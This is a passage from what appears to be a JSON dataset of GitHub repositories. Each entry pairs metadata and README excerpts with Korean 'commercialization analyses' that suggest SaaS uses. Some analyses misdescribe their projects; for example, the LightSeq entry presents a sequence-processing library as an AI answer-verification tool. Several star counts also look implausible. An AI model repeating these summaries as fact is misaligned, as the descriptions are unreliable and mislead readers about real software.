Editor.md\r\n\r\n![](https://pandao.github.io/editor.md/images/logos/editormd-logo-180x180.png)\r\n\r\n![](https://img.shields.io/github/stars/pandao/editor.md.svg)\r\n![](https://img.shields.io/github/forks/pandao/editor.md.svg)\r\n![](https://img.shields.io/github/tag/pandao/editor.md.svg)\r\n![](https://img.shields.io/github/release/pandao/editor.md.svg)\r\n![](https://img.shields.io/github/issues/pandao/editor.md.svg)\r\n![](https://img.shields.io/bower/v/editor.md.svg)\r\n\r\n**Editor.md** : The open source embeddable online markdown editor (component), based on CodeMirror & jQuery & Marked.\r\n\r\n### Features\r\n\r\n- Support Standard Markdown / CommonMark and GFM (GitHub Flavored Markdown);\r\n- Full-featured: Real-time Preview, Image (cross-domain) upload, Preformatted text/Code blocks/Tables insert, Code fold, Search replace, Read only, Themes, Multi-languages, L18n, HTML entities, Code syntax highlighting...;\r\n- Markdown Extras : Support [ToC (Table of Contents)](https://pandao.github.io/editor.md/exampl","composite_score":0.5985,"license_safety_tag":"safe"},{"name":"YoongiKim/AutoCrawler","github_url":"https://github.com/YoongiKim/AutoCrawler","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":26,"description":"# AutoCrawler 상용화 분석\n\n## 왜 보물인가\n웹사이트의 정보를 자동으로 수집하는 도구로, 수작업 없이 대량의 데이터를 빠르게 모을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **가격 비교 서비스**: 경쟁사 제품 가격을 자동으로 수집하여 고객에게 최저가 정보 제공\n2. **부동산 정보 플랫폼**: 여러 중개업소의 매물 정보를 자동으로 수집하","readme_excerpt":"# AutoCrawler\nGoogle, Naver multiprocess image crawler (High Quality & Speed & Customizable)\n\n![](docs/animation.gif)\n\n# How to use\n\n1. Install Chrome\n\n2. pip install -r requirements.txt\n\n3. Write search keywords in keywords.txt\n\n4. **Run \"main.py\"**\n\n5. Files will be downloaded to 'download' directory.\n\n\n# Arguments\nusage:\n```\npython3 main.py [--skip true] [--threads 4] [--google true] [--naver true] [--full false] [--face false] [--no_gui auto] [--limit 0]\n```\n\n```\n--skip true        Skips keyword if downloaded directory already exists. This is needed when re-downloading.\n\n--threads 4        Number of threads to download.\n\n--google true      Download from google.com (boolean)\n\n--naver true       Download from naver.com (boolean)\n\n--full false       Download full resolution image instead of thumbnails (slow)\n\n--face false       Face search mode\n\n--no_gui auto      No GUI mode. (headless mode) Acceleration for full_resolution mode, but unstable on thumbnail mode.\n                   Def","composite_score":0.5985,"license_safety_tag":"safe"},{"name":"lyhue1991/eat_tensorflow2_in_30_days","github_url":"https://github.com/lyhue1991/eat_tensorflow2_in_30_days","stars":36,"language":"Python","license":"Apache-2.0","abandonment_months":45,"description":"# eat_tensorflow2_in_30_days 상용화 분석\n\n## 왜 보물인가\n인공지능을 배우고 싶어 하는 초보자들을 위해 30일 안에 실무 기술을 가르칠 수 있는 완성된 학습 커리큘럼입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 SaaS**: 이 커리큘럼을 기반으로 동영상 강의, 퀴즈, 프로젝트 피드백을 제공하는 월간 구독 교육 플랫폼\n2","readme_excerpt":"# How to eat TensorFlow2 in 30 days ?🔥🔥\n\nClick here for [Chinese Version（中文版）](#30天吃掉那只-tensorflow2)\n\n**《10天吃掉那只pyspark》**\n* 🚀 github项目地址: https://github.com/lyhue1991/eat_pyspark_in_10_days\n* 🐳 和鲸专栏地址: https://www.heywhale.com/home/column/5fe6aa955e24ed00302304e0 【代码可直接fork后云端运行，无需配置环境】\n\n\n**《20天吃掉那只Pytorch》**\n* 🚀 github项目地址: https://github.com/lyhue1991/eat_pytorch_in_20_days\n* 🐳 和鲸专栏地址: https://www.heywhale.com/home/column/5f2ac5d8af3980002cb1bc08 【代码可直接fork后云端运行，无需配置环境】\n\n\n**《30天吃掉那只TensorFlow2》**\n* 🚀 github项目地址: https://github.com/lyhue1991/eat_tensorflow2_in_30_days\n* 🐳 和鲸专栏地址: https://www.heywhale.com/home/column/5d8ef3c3037db3002d3aa3a0 【代码可直接fork后云端运行，无需配置环境】\n\n**极速通道** \n*  🚀 公众号 “**算法美食屋**” 后台回复暗号：\"**吃货来了**\"\n*  😋 获取以上3套教程的jupyter notebook 源码文件以及全部数据集的百度云盘下载链接。\n*   https://mp.weixin.qq.com/s/ymLtH5BqlWAkpOmCLQOYxw \n\n\n### 1. TensorFlow2 🍎 or Pytorch🔥\n\nConclusion first: \n\n**For the engineers, priority goes to TensorFlow2.**\n\n**For the students and researchers，first choice should be","composite_score":0.5984,"license_safety_tag":"safe"},{"name":"kon9chunkit/GitHub-Chinese-Top-Charts","github_url":"https://github.com/kon9chunkit/GitHub-Chinese-Top-Charts","stars":33,"language":"Java","license":"NOASSERTION","abandonment_months":20,"description":"# GitHub-Chinese-Top-Charts 분석 보고서\n\n## 왜 보물인가\n중국의 인기 있는 프로그래밍 프로젝트들을 한눈에 볼 수 있는 순위표로, 중국 개발자 커뮤니티의 트렌드를 파악하는 데 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 채용 플랫폼**: 중국 지역의 우수 개발자를 찾기 위해 인기 프로젝트 기여자 정보 제공\n2. **기","readme_excerpt":"<p align=\"center\">\n    <img width=\"200\" src=\"content/media/repo_logo.svg\">\n</p>\n\n<h1 align=\"center\">GitHub中文排行榜</h1>\n\n<div align=\"center\">\n    「帮助你发现优秀中文项目，可以无语言障碍地、更高效地吸收优秀经验成果」\n</div>\n\n<br />\n\n<div align=\"center\">\n    <p><sub>↓ -- 项目说明 -- ↓</sub></p>\n    <a href=\"content/docs/features.md\">特色亮点</a> •\n    <a href=\"content/docs/definition_of_Chinese_repo.md\">中文定义</a> •\n    <a href=\"content/docs/inclusion_rules.md\">收录规则</a> •\n    <a href=\"content/docs/milestone.md\">重要更新</a> •\n    <a href=\"content/docs/feedback.md\">问题反馈</a> •\n    <a href=\"LICENSE.md\">许可协议</a>\n</div>\n\n<br />\n\n<div align=\"center\">\n    <p><sub>↓ -- 进阶之路 -- ↓</sub></p>\n    中文项目已通关？通往更广阔世界的路：<a href=\"https://github.com/kon9chunkit/GitHub-English-Top-Charts\">GitHub英文排行榜</a>\n</div>\n\n<br />\n\n<div align=\"center\">\n    <p><sub>↓ -- 内容目录 -- ↓</sub></p>\n    <table>\n        <tr>\n            <td colspan=\"2\" align=\"center\">中文总榜</td>\n            <td colspan=\"2\" align=\"center\">中文增速榜</td>  \n            <td colspan=\"2\" align=\"center\">中文新秀榜</","composite_score":0.5979,"license_safety_tag":"unknown"},{"name":"tesseract-ocr/tessdata","github_url":"https://github.com/tesseract-ocr/tessdata","stars":7,"language":"","license":"Apache-2.0","abandonment_months":27,"description":"# Tesseract OCR Tessdata 저장소 분석\n\n## 왜 보물인가\n사진이나 스캔한 문서에서 글자를 자동으로 읽어내는 기술의 핵심 데이터셋으로, 많은 기업과 서비스에서 필요로 하는 오픈소스 자산입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 영수증/청구서 자동 처리 SaaS**\n- 소상공인과 회계팀이 사용하는 자동 청구서 인식 서비스에 핵심 기술 제","readme_excerpt":"tessdata\n========\n\nThese language data files only work with Tesseract 4.0.0 and newer versions.\nThey are based on the sources in\n[tesseract-ocr/langdata](https://github.com/tesseract-ocr/langdata) on GitHub.\n(still to be updated for 4.0.0 - 20180322)\n\nThese have models for legacy tesseract engine (--oem 0) as well as the new LSTM neural net based engine (--oem 1).\n\nThe LSTM models (--oem 1) in these files \nhave been updated to the integerized versions of \n[tessdata_best](https://github.com/tesseract-ocr/tessdata_best) on GitHub.\nSo, they should be faster but probably a little less accurate than tessdata_best.\n\n[tessdata_fast](https://github.com/tesseract-ocr/tessdata_fast) on GitHub\nprovides an alternate set of integerized LSTM models which have been built with a smaller network.\ntessdata_fast files are the ones packaged for Debian and Ubuntu.\n\nThe legacy tesseract models (--oem 0) have been removed for Indic and\nArabic script language files.\n\ntessdata for 3.04 or 3.05\n----------------","composite_score":0.5977,"license_safety_tag":"safe"},{"name":"ethereum-boilerplate/ethereum-boilerplate","github_url":"https://github.com/ethereum-boilerplate/ethereum-boilerplate","stars":20,"language":"TypeScript","license":"MIT","abandonment_months":24,"description":"# ethereum-boilerplate 상용화 분석\n\n## 왜 보물인가\n암호화폐 지갑을 쉽게 만들 수 있는 기본 틀이 되어, 블록체인 스타트업들이 개발 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 암호화폐 거래 플랫폼용 지갑 관리 시스템을 월 구독으로 판매\n2. **내부 업무 도구**: 기업의 암호화폐 자산 관","readme_excerpt":"# `ethereum-boilerplate`\n\n> Fully Typescript ready NextJS components for fast building dApps without running own backend\n\n🚀DEMO: https://eth-boilerplate.vercel.app/\n\nThis boilerplate is built with [Moralis](https://moralis.io?utm_source=github&utm_medium=readme&utm_campaign=ethereum-boilerplate)\n\nYou need active web3 provider/wallet only for authentication. All pages in this boilerplate do not require an active web3 provider, they use Moralis Web3 API. Moralis supports the most popular blockchains and their test networks. You can find a list of all available networks in [Moralis Supported Chains](https://docs.moralis.io/reference/supported-chains-nft)\n\nPlease check the [official documentation of Moralis](https://docs.moralis.io/) for all the functionalities of Moralis.\n\n![eth-boilerplate](https://user-images.githubusercontent.com/78314301/186810447-fa66cd80-5bbb-4e41-b29f-862c8cc67d43.gif)\n\n# ⭐️ `Star us`\n\nIf this boilerplate helps you build Ethereum dapps faster - please star this pro","composite_score":0.5972,"license_safety_tag":"safe"},{"name":"PeterL1n/BackgroundMattingV2","github_url":"https://github.com/PeterL1n/BackgroundMattingV2","stars":10,"language":"Python","license":"MIT","abandonment_months":24,"description":"# BackgroundMattingV2 상용화 분석\n\n## 왜 보물인가\n사진이나 영상에서 배경을 자동으로 제거하는 기술로, 전문적인 편집 작업을 누구나 쉽게 할 수 있게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 증명사진 자동 편집 앱이나 온라인 이력서 프로필 사진 생성 서비스로 운영\n2. **내부 업무 도구**: 대규모 유통사","readme_excerpt":"# Real-Time High-Resolution Background Matting\n\n![Teaser](https://github.com/PeterL1n/Matting-PyTorch/blob/master/images/teaser.gif?raw=true)\n\nOfficial repository for the paper [Real-Time High-Resolution Background Matting](https://arxiv.org/abs/2012.07810). Our model requires capturing an additional background image and produces state-of-the-art matting results at 4K 30fps and HD 60fps on an Nvidia RTX 2080 TI GPU.\n\n* [Visit project site](https://grail.cs.washington.edu/projects/background-matting-v2/)\n* [Watch project video](https://www.youtube.com/watch?v=oMfPTeYDF9g)\n\n**Disclaimer**: The video conversion script in this repo is not meant be real-time. Our research's main contribution is the neural architecture for high resolution refinement and the new matting datasets. The `inference_speed_test.py` script allows you to measure the tensor throughput of our model, which should achieve real-time. The `inference_video.py` script allows you to test your video on our model, but the video","composite_score":0.5968,"license_safety_tag":"safe"},{"name":"frank-lam/fullstack-tutorial","github_url":"https://github.com/frank-lam/fullstack-tutorial","stars":5,"language":"Java","license":"unknown","abandonment_months":42,"description":"# fullstack-tutorial 상용화 분석\n\n## 왜 보물인가\n웹 개발 초보자부터 실무자까지 한 번에 배울 수 있는 완전한 학습 교재로, 프론트엔드부터 백엔드까지 실제 프로젝트에 필요한 모든 것을 담고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 개발 교육 SaaS**\n- 월 구독형 코딩 강의 플랫폼에서 커리큘럼으로 활용하여 월 회원료 수","readme_excerpt":"<div align=\"center\"><img src=\"assets/logo-2021.svg\" width=\"80%\"/></div><br/>\n\n|              I              |           II           |           III           |           IV           |            V            |            VI            |        VII        |         VIII         | IX |            X            |            XI            |            XII            |\n| :--------------------------: | :-------------------: | :----------------------: | :---------------------: | :--------------: | :---------------: | :----------------------: | :----------------------: | :----------------------: | :----------------------: | :----------------------: | :----------------------: |\n| 算法<br />[📝](#一数据结构与算法) | Java<br/>[☕️](#二java) | Python<br />[🐍](#三python) | 前端<br />[🔗](#四前端) | 数据库<br/>[💾](#五数据库) | 操作系统<br/>[💻](#六操作系统) | 网络通信<br/>[☁️](#七网络通信) | 分布式<br/>[📃](#八分布式) | 机器学习<br/> [🔍](#九机器学习) |工具<br/>[🔨](#十工具) |Learn<br />[📖](#learn-) |Talking<br />[💡](#talking-bulb) |\n\n<div align=\"center\">  \n    <p>\n ","composite_score":0.5961,"license_safety_tag":"unknown"},{"name":"GeekAlexis/FastMOT","github_url":"https://github.com/GeekAlexis/FastMOT","stars":5,"language":"Python","license":"MIT","abandonment_months":22,"description":"# FastMOT 저장소 분석\n\n## 왜 보물인가\nCCTV나 드론 영상에서 여러 사람을 동시에 추적하는 기술로, 보안·물류·스포츠 분석 등 실시간 감시가 필요한 산업에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n\n**1. CCTV 통합 관리 SaaS**\n- 건물·공장 영상 분석 서비스로 월 구독 판매 (소규모 상점부터 대형 시설까지)\n\n**2. 물","readme_excerpt":"# FastMOT\n\n[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2FGeekAlexis%2FFastMOT&count_bg=%2379C83D&title_bg=%23555555&icon=&icon_color=%23E7E7E7&title=hits&edge_flat=false)](https://hits.seeyoufarm.com) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![DOI](https://zenodo.org/badge/237143671.svg)](https://zenodo.org/badge/latestdoi/237143671)\n\n<img src=\"assets/dense_demo.gif\" width=\"400\"/> <img src=\"assets/aerial_demo.gif\" width=\"400\"/>\n\n## News\n  - (2021.8.17) Support multi-class tracking\n  - (2021.7.4) Support yolov4-p5 and yolov4-p6\n  - (2021.2.13) Support Scaled-YOLOv4 (i.e. yolov4-csp/yolov4x-mish/yolov4-csp-swish)\n  - (2021.1.3) Add DIoU-NMS for postprocessing\n  - (2020.11.28) Docker container provided for x86 Ubuntu\n\n## Description\nFastMOT is a custom multiple object tracker that implements:\n  - YOLO detector\n  - SSD detector\n  - Deep SORT + OSNet ReID\n  - KLT tracker\n  - Camera motion compensation\n\nTw","composite_score":0.5959,"license_safety_tag":"safe"},{"name":"JWarmenhoven/ISLR-python","github_url":"https://github.com/JWarmenhoven/ISLR-python","stars":5,"language":"Jupyter Notebook","license":"MIT","abandonment_months":44,"description":"# ISLR-python 저장소 분석\n\n## 왜 보물인가\n통계학과 데이터 분석을 배우는 학생과 직장인들이 실제 예제로 연습할 수 있는 완성된 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 데이터 분석 입문 강좌의 실습 자료로 판매\n2. **기업 교육 솔루션**: 금융사·제약사 등에서 직원 통계 교육용 내부 도구로 제공\n3. ","readme_excerpt":"# ISLR-python\nThis repository contains Python code for a selection of tables, figures and LAB sections from the first edition of the book <A target=\"_blank\" href='https://www.statlearning.com/'>'An Introduction to Statistical Learning with Applications in R'</A> by James, Witten, Hastie, Tibshirani (2013).<P>\n\n For **Bayesian data analysis** using PyMC3, take a look at <A href='https://github.com/JWarmenhoven/DBDA-python'>this repository</A>.\n\n**2018-01-15**:<BR>\nMinor updates to the repository due to changes/deprecations in several packages. The notebooks have been tested with <A href='http://nbviewer.jupyter.org/github/JWarmenhoven/ISLR-python/blob/master/Notebooks/Python%20module%20versions.ipynb'>these package versions</A>. Thanks @lincolnfrias and @telescopeuser.\n<P>\n\n**2016-08-30**:<BR>\nChapter 6: I included Ridge/Lasso regression code using the new <A href='https://github.com/civisanalytics/python-glmnet'>python-glmnet</A> library. This is a python wrapper for the Fortran librar","composite_score":0.5957,"license_safety_tag":"safe"},{"name":"youfou/wxpy","github_url":"https://github.com/youfou/wxpy","stars":8,"language":"Python","license":"mit","abandonment_months":84,"description":"# wxpy 프로젝트 분석\n\n## 왜 보물인가\nWeChat(중국 메신저 앱)을 프로그래밍으로 자동 제어할 수 있는 도구로, 고객 상담 자동화나 마케팅 업무를 효율화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **고객 서비스 자동화**: WeChat 채팅방에서 자동으로 고객 질문에 답변하는 챗봇 서비스\n- **마케팅 자동화**: 대량의 고객에게 정보를 일","readme_excerpt":"wxpy: 用 Python 玩微信\n==============================\n\n.. image:: https://badge.fury.io/py/wxpy.svg\n    :target: https://badge.fury.io/py/wxpy\n\n.. image:: https://img.shields.io/pypi/pyversions/wxpy.svg\n        :target: https://github.com/youfou/wxpy\n\n.. image:: https://readthedocs.org/projects/wxpy/badge/?version=latest\n    :target: http://wxpy.readthedocs.io/zh/latest/?badge=latest\n\n微信机器人 / 可能是最优雅的微信个人号 API\n    wxpy 在 itchat 的基础上，通过大量接口优化提升了模块的易用性，并进行丰富的功能扩展\n\n\n..  attention::\n\n    | **强烈建议仅使用小号运行机器人！**\n\n    | 从近期 (17年6月下旬) 反馈来看，使用机器人存在一定概率被限制登录的可能性。\n    | 主要表现为无法登陆 Web 微信 (但不影响手机等其他平台)。\n\n\n\n用来干啥\n----------------\n\n一些常见的场景\n\n* 控制路由器、智能家居等具有开放接口的玩意儿\n* 运行脚本时自动把日志发送到你的微信\n* 加群主为好友，自动拉进群中\n* 跨号或跨群转发消息\n* 自动陪人聊天\n* 逗人玩\n* ...\n\n总而言之，可用来实现各种微信个人号的自动化操作\n\n\n..\n    体验一下\n    ----------------\n\n    **这有一个现成的微信机器人，想不想调戏一下？**\n\n    记得填写入群口令 👉 [ **wxpy** ]，与群里的大神们谈笑风生 😏\n\n    ..  image:: https://github.com/youfou/wxpy/raw/master/docs/wechat-group.png\n\n\n轻松安装\n----------------\n\nwxpy 支持 Python 3.4-3.6，以及 2.7 版本\n\n将下方命令中","composite_score":0.5954,"license_safety_tag":"safe"},{"name":"androiddevnotes/awesome-android-kotlin-apps","github_url":"https://github.com/androiddevnotes/awesome-android-kotlin-apps","stars":6,"language":"Kotlin","license":"unknown","abandonment_months":23,"description":"# androiddevnotes/awesome-android-kotlin-apps 분석\n\n## 왜 보물인가\n안드로이드 앱 개발에 필요한 검증된 코드 예제와 학습 자료를 한곳에 모아놓아, 개발자들이 빠르게 고품질 앱을 만들 수 있게 돕는 지식 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **앱 개발 교육 플랫폼**: 유데미, 인프런 같은 온라인 강의 사이트에","readme_excerpt":"\n\n<!--\nTHIS IS A COMPUTER GENERATED README FILE. IF YOU'RE HERE TO MODIFY SOME CONTENT, GOTO \nhttps://github.com/androiddevnotes/awesome-android-kotlin-apps/edit/master/README.model.md \nAND EDIT THE  MODEL FILE.\n-->\n\n\n<h1 align=\"center\">Awesome Android Kotlin Apps</h1></br>\n\n<p align=\"center\">\n:eyeglasses: A curated list of awesome android kotlin apps by open-source contributors.\n</p>\n<br>\n\n<p align=\"center\">\n  <a href=\"#\"><img alt=\"Awesome Android Kotlin Apps Count badge\" src=\"https://badgen.net/badge/Apps/143?icon=https://raw.githubusercontent.com/androiddevnotes/awesome-android-kotlin-apps/master/assets/count.svg&color=0984e3\"/></a>\n  <a href=\"#\"><img alt=\"Android Language Badge\" src=\"https://badgen.net/badge/OS/Android?icon=https://raw.githubusercontent.com/androiddevnotes/awesome-android-kotlin-apps/master/assets/android.svg&color=3ddc84\"/></a>\n  <a href=\"#\"><img alt=\"Kotlin Language Badge\" src=\"https://badgen.net/badge/language/Kotlin?icon=https://raw.githubusercontent.com/androi","composite_score":0.5953,"license_safety_tag":"unknown"},{"name":"londonappbrewery/Flutter-Course-Resources","github_url":"https://github.com/londonappbrewery/Flutter-Course-Resources","stars":99,"language":"","license":"unknown","abandonment_months":23,"description":"# Flutter 코스 자료 저장소 분석\n\n## 왜 보물인가\n스마트폰 앱을 만드는 가장 쉬운 방법을 배울 수 있는 완성도 높은 교육 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n- **온라인 교육 플랫폼**: 유데미, 코드카데미 같은 사이트에서 구독형 강의 콘텐츠로 판매\n- **기업 교육 서비스**: 대기업 신입사원이나 개발팀을 위한 맞춤형 스마트폰 앱 개","readme_excerpt":"# Flutter-Course-Resources\n\n## Section 1: Introduction to Cross-Platform Development with Flutter and Dart\n\n* [Download the Course Syllabus](https://drive.google.com/uc?export=download&id=1itL9AXx7Z-RxFAjSLLhsTeTFZYrkfweR)\n* [Cornell Note Taking System - App Brewery Template](https://drive.google.com/uc?export=download&id=1RfRLujREfLx1PSpw9bubNDsvRuknJ5ek)\n\n\n## Section 2: Setting Up for Flutter Development\n\n* [Getting Started: Installing Flutter](https://flutter.dev/docs/get-started/install)\n* [Git for Windows](https://git-scm.com/download/win)\n* [Git for Mac](https://desktop.github.com)\n* [Install Android Studio](https://developer.android.com/studio/)\n* [iOS Setup Instructions](https://flutter.dev/docs/get-started/install/macos#ios-setup)\n\n\n## Section 3: I Am Rich - How to Create Flutter Apps from Scratch\n\n* [Material Design](https://material.io/)\n* [Scaffold Documentation](https://docs.flutter.io/flutter/material/Scaffold-class.html)\n* [AppBar Documentation](https://docs.flutter.io/f","composite_score":0.595,"license_safety_tag":"unknown"},{"name":"bytedance/lightseq","github_url":"https://github.com/bytedance/lightseq","stars":8,"language":"C++","license":"NOASSERTION","abandonment_months":37,"description":"# ByteDance LightSeq 분석 보고서\n\n## 왜 보물인가\nAI 모델이 잘못된 답변을 하지 않도록 검증하는 기술로, 신뢰할 수 있는 AI 서비스를 원하는 기업들에게 핵심 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n1. **고객 지원 챗봇 SaaS**: 은행·보험사의 자동 상담 시스템에서 잘못된 금융 정보 제공을 사전에 차단\n2. **의료 AI 분","readme_excerpt":"# LightSeq: A High Performance Library for Sequence Processing and Generation\n\n![logo](./docs/images/logo.png)\n\n---\n\n## Table Of Contents\n- [Release Notes](#release-notes)\n- [Introduction](#introduction)\n    - [Support Matrix](#support-matrix)\n- [Performance](#performance)\n    - [Speedup of Transformer Training](#speedup-of-transformer-training)\n    - [Speedup of BERT Training](#speedup-of-bert-training)\n    - [Speedup of Transformer Inference](#speedup-of-transformer-inference)\n    - [Speedup of BERT Inference](#speedup-of-bert-inference)\n- [Installation](#installation)\n    - [Install from PyPI](#install-from-pypi)\n    - [Build from Source](#build-from-source)\n- [Getting Started](#getting-started)\n    - [LightSeq Training from Scratch](#lightseq-training-from-scratch)\n    - [LightSeq Training from Fairseq](#lightseq-training-from-fairseq)\n    - [LightSeq Training from Hugging Face BERT](#lightseq-training-from-hugging-face-bert)\n    - [LightSeq Inference from Fairseq](#lightseq-infere","composite_score":0.5949,"license_safety_tag":"unknown"},{"name":"luin/ranaly","github_url":"https://github.com/luin/ranaly","stars":498,"language":"JavaScript","license":"unknown","abandonment_months":71,"description":"# ranaly 저장소 분석\n\n## 왜 보물인가\n실시간으로 데이터를 분석하고 패턴을 찾아주는 도구로, 복잡한 통계 작업을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 제조업체가 생산 데이터를 실시간으로 분석해 불량품을 미리 찾는 품질 관리 플랫폼\n- **내부 업무 도구**: 마케팅팀이 고객 행동 데이터를 즉시 분석해 ","readme_excerpt":"# Ranaly\nRanaly是一个基于Redis的数据统计可视化工具。\n\nRanaly的Node.js客户端库[node_ranaly](https://github.com/luin/node_ranaly)已经完成。\n\n![效果图](./assets/preview.png)\n\n特点如下：\n\n1. 使用简单，容易维护\n2. 基于Redis，性能优异\n3. 支持模块级别的权限控制\n4. 长连接实时数据统计\n5. 多种图表可以选择，可以自定义模板、模块\n\n## 快速入门\n在项目中使用Ranaly统计数据十分简单，步骤如下。\n### 1. 安装Node.js和Redis\nRanaly使用Node.js开发，所以需要先安装[Node.js](http://nodejs.org/)。同样因为Ranaly的统计数据存储于Redis中，所以需要安装[Redis](http://redis.io/)。\n### 2. 安装Ranaly\n\n\tgit clone git://github.com/luin/ranaly.git\n\tcd ranaly\n\tnpm install\n\n### 3. 在已有项目中加入统计代码\n如果你的项目使用Node.js开发，可以使用Ranaly的node客户端库，安装方法如下：\n\n\tnpm install node_ranaly\n\n如果希望统计项目注册用户的变化趋势，可以在用户注册成功后加上如下代码：\n\n\tvar ranaly = require('node_ranaly').createClient();\n\tvar rUsers = new ranaly.Amount('Users');\n\trUsers.incr();\n\nnode_ranaly库会将名为“Users”的Amount类型的桶的值增1并和当前时间一起写入到Redis中。\n\n### 4. 查看统计结果\n建立配置文件，内容如下：\n\n\tapp_name: Demo\n\tusers:\n\t  - username: admin\n\t    password: admin123\n\tpages:\n\t  - title: Overview\n\t    widgets:\n\t      - type: amount_line_chart\n\t        bucket: Users\n\n将文件保存，并进入Ranaly","composite_score":0.5945,"license_safety_tag":"unknown"},{"name":"atom/teletype","github_url":"https://github.com/atom/teletype","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":39,"description":"# atom/teletype 평가 보고서\n\n## 왜 보물인가\n여러 사람이 동시에 같은 문서를 함께 편집할 수 있는 협업 기술로, Google Docs처럼 실시간으로 변경사항이 반영되는 시스템입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 팀 협업 문서 편집 플랫폼(Notion, Confluence 같은 서비스)에 실시간 편집 기능 추가\n","readme_excerpt":"##### Atom and all repositories under Atom will be archived on December 15, 2022. Learn more in our [official announcement](https://github.blog/2022-06-08-sunsetting-atom/)\n # Teletype for Atom\n\nAn Atom package that lets developers share their workspace with team members and collaborate on code in real time.\n\nLearn more at [teletype.atom.io](https://teletype.atom.io).\n\n![demo](https://user-images.githubusercontent.com/2988/32753167-d781baf0-c899-11e7-8b64-683ab84d3a8c.gif)\n\n## Installation\n\n### Command Line\n\n1. Install [Atom 1.22](https://atom.io) or newer\n2. In the terminal, install the package via apm:\n\n    ```sh\n    apm install teletype\n    ```\n\n### GUI\n\n1. Install [Atom 1.22](https://atom.io) or newer\n1. Launch Atom\n1. Open Settings View using <kbd>Cmd+,</kbd> on macOS or <kbd>Ctrl+,</kbd> on other platforms\n1. Click the Install tab on the left side\n1. Enter `teletype` in the search box and press <kbd>Enter</kbd>\n1. Click the \"Install\" button that appears\n\n## Hacking\n\nThis package ","composite_score":0.5944,"license_safety_tag":"safe"},{"name":"Azure-Samples/python-docs-hello-world","github_url":"https://github.com/Azure-Samples/python-docs-hello-world","stars":143,"language":"Python","license":"MIT","abandonment_months":22,"description":"","readme_excerpt":"","composite_score":0.5934,"license_safety_tag":"safe"},{"name":"liyasthomas/postwoman","github_url":"https://github.com/liyasthomas/postwoman","stars":103,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"","readme_excerpt":"<div align=\"center\">\n  <a href=\"https://hoppscotch.io\">\n    <img\n      src=\"https://avatars.githubusercontent.com/u/56705483\"\n      alt=\"Hoppscotch\"\n      height=\"64\"\n    />\n  </a>\n  <h3>\n    <b>\n      Hoppscotch\n    </b>\n  </h3>\n  <b>\n    Open Source API Development Ecosystem\n  </b>\n  <p>\n\n[![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen?logo=github)](CODE_OF_CONDUCT.md) [![Website](https://img.shields.io/website?url=https%3A%2F%2Fhoppscotch.io&logo=hoppscotch)](https://hoppscotch.io) [![Tests](https://github.com/hoppscotch/hoppscotch/actions/workflows/tests.yml/badge.svg)](https://github.com/hoppscotch/hoppscotch/actions) [![Tweet](https://img.shields.io/twitter/url?url=https%3A%2F%2Fhoppscotch.io%2F)](https://x.com/share?text=%F0%9F%91%BD%20Hoppscotch%20%E2%80%A2%20Open%20source%20API%20development%20ecosystem%20-%20Helps%20you%20create%20requests%20faster,%20saving%20precious%20time%20on%20development.&url=https://hoppscotch.io&hashtags=hopps","composite_score":0.5929,"license_safety_tag":"safe"},{"name":"vdumoulin/conv_arithmetic","github_url":"https://github.com/vdumoulin/conv_arithmetic","stars":5,"language":"TeX","license":"MIT","abandonment_months":36,"description":"# vdumoulin/conv_arithmetic 분석\n\n## 왜 보물인가\n이 저장소는 인공지능이 이미지를 처리할 때 내부적으로 어떻게 작동하는지 시각적으로 설명하는 교육 자료로, 복잡한 기술을 누구나 이해할 수 있게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **AI 교육 플랫폼 SaaS**: 대학생과 개발자가 AI 원리를 배우는 온라인 교육 서비스","readme_excerpt":"# Convolution arithmetic\n\nA technical report on convolution arithmetic in the context of deep learning.\n\nThe code and the images of this tutorial are free to use as regulated by the \nlicence and subject to proper attribution:\n\n* \\[1\\] Vincent Dumoulin, Francesco Visin - [A guide to convolution arithmetic\n  for deep learning](https://arxiv.org/abs/1603.07285)\n  ([BibTeX](https://gist.github.com/fvisin/165ca9935392fa9600a6c94664a01214))\n\n## Convolution animations\n\n_N.B.: Blue maps are inputs, and cyan maps are outputs._\n\n<table style=\"width:100%; table-layout:fixed;\">\n  <tr>\n    <td><img width=\"150px\" src=\"gif/no_padding_no_strides.gif\"></td>\n    <td><img width=\"150px\" src=\"gif/arbitrary_padding_no_strides.gif\"></td>\n    <td><img width=\"150px\" src=\"gif/same_padding_no_strides.gif\"></td>\n    <td><img width=\"150px\" src=\"gif/full_padding_no_strides.gif\"></td>\n  </tr>\n  <tr>\n    <td>No padding, no strides</td>\n    <td>Arbitrary padding, no strides</td>\n    <td>Half padding, no strides</td>\n ","composite_score":0.5928,"license_safety_tag":"safe"},{"name":"BalestraPatrick/HapticButton","github_url":"https://github.com/BalestraPatrick/HapticButton","stars":499,"language":"Swift","license":"MIT","abandonment_months":103,"description":"# HapticButton 상용화 분석\n\n## 왜 보물인가\n스마트폰이나 기기의 버튼을 누를 때 마치 실제 물리 버튼을 누르는 것처럼 진동 피드백을 주는 기술로, 사용자 경험을 한 단계 업그레이드할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 게임 SaaS**: 게임 개발사들에게 진동 피드백 엔진을 월 구독으로 제공\n2. **스마트 기기 제어 